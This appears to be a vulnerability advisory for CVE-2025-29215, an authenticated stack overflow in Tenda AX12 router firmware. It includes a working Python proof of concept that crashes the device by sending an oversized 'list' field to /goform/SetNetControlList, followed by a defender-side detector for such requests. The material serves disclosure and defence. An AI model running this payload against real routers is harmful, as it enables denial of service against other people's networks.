@isstabber
Last active March 21, 2025 01:11
CVE-ID

CVE-2025-29215

Information

Vendor of the products: Tenda

Vendor's website: https://www.tenda.com.cn/

Reported by: Zhao Jiang Ting (sta8r9@163.com)

Affected products: Tenda AX12 V1.0 router

Affected firmware version: US_AX12V1.0in_V22.03.01.46_cn_TDC01.bin

Firmware download address: AX12 V1.0 upgrade software (Tenda's download page)

Overview

A stack overflow vulnerability exists in Tenda AX12 V1.0 firmware V22.03.01.46_CN because the sub_43fdcc function behind /goform/SetNetControlList does not check the length of the list field in the request body and copies its contents directly into a stack buffer. An attacker who has already authenticated can send a POST request whose list field carries a large amount of junk data, crashing the process and causing a denial of service (DoS).

Vulnerability details

The vulnerable code is the sub_43fdcc function that handles the /goform/SetNetControlList interface.

The web_get_values function reads the value of the list field from the request body, stores it in variable v1, and passes v1 to sub_43fbbc.


The overflow itself occurs in the sub_43FBBC function, where the parameter value is copied into a stack buffer without any length check.


PoC

Send the following POST request to /goform/SetNetControlList. The IP address and the passwd variable in the PoC must be changed to match the target router.

import requests


def stackk_over(passwd, payload):
    # Target router address; change this to match the device under test.
    url = "http://192.168.30.149/goform/SetNetControlList"
    headers = {
        "Host": "192.168.30.149",
        "Connection": "keep-alive",
        # Content-Length is computed by requests from the body, so it is not set by hand here.
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Upgrade-Insecure-Requests": "1",
        "Origin": "http://192.168.30.149",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
        "Referer": "http://192.168.30.149/goform/main.html",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        # The router authenticates the request through this cookie.
        "Cookie": f"password={passwd}",
    }
    data = {
        # The unchecked field: its value is copied into a fixed-size stack buffer.
        "list": payload,
    }
    response = requests.post(url, headers=headers, data=data)
    print("status:", response.status_code)
    print(response.text)


payload = "a" * 0x300  # 768 bytes, well beyond the 256-byte buffer
passwd = "25d55ad283aa400af464c76d713c07adijyded"  # replace with the valid password cookie value
stackk_over(passwd, payload)

Attack Demonstration

Access the SetNetControlList interface after authorization and send a POST request whose list field is set to a large amount of junk data, beyond the 256-byte range. The IP address and the passwd variable in the PoC must be changed to match the target. With passwd set correctly, running the PoC directly triggers a segmentation fault, which can be seen in the router logs.

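As an added defender-side check, not part of this advisory or of Tenda's firmware: a small Python detector that parses raw HTTP request text and flags a POST to /goform/SetNetControlList whose list value exceeds the 256-byte buffer described above. The raw-text input format, the 256-byte threshold and the sample requests are assumptions constructed for this example.

```python
from urllib.parse import parse_qs

# Constructed assumptions, not from the advisory: requests arrive as raw HTTP/1.1
# text (e.g. exported from a proxy or pcap), and the stack buffer is 256 bytes.
VULN_PATH = "/goform/SetNetControlList"
VULN_FIELD = "list"
MAX_SAFE_LEN = 256


def parse_raw_request(raw: str):
    """Split raw HTTP request text into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body


def check_request(raw: str):
    """Return a finding dict for an oversized list value sent to the handler, else None."""
    method, path, headers, body = parse_raw_request(raw)
    if method != "POST" or path != VULN_PATH:
        return None
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    # Length is measured in bytes, since that is what gets copied onto the stack.
    for value in parse_qs(body, keep_blank_values=True).get(VULN_FIELD, []):
        size = len(value.encode("utf-8"))
        if size > MAX_SAFE_LEN:
            return {
                "path": path,
                "field": VULN_FIELD,
                "length": size,
                "authenticated": "password=" in headers.get("cookie", ""),
            }
    return None


# Constructed sample traffic: a normal-looking update and an oversized one
# shaped like the advisory's PoC (0x300 bytes of filler in the list field).
BENIGN = (
    "POST /goform/SetNetControlList HTTP/1.1\r\n"
    "Host: 192.168.30.149\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: password=PLACEHOLDER\r\n"
    "\r\n"
    "list=192.168.30.20%2C1"
)
OVERSIZED = BENIGN.replace("list=192.168.30.20%2C1", "list=" + "a" * 0x300)
```

Run it over proxy or IDS captures of the router's management interface; any finding on this path is a request that would crash the unpatched firmware.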

Impact

Triggering the stack overflow terminates the process abnormally, which results in a denial of service (DoS).
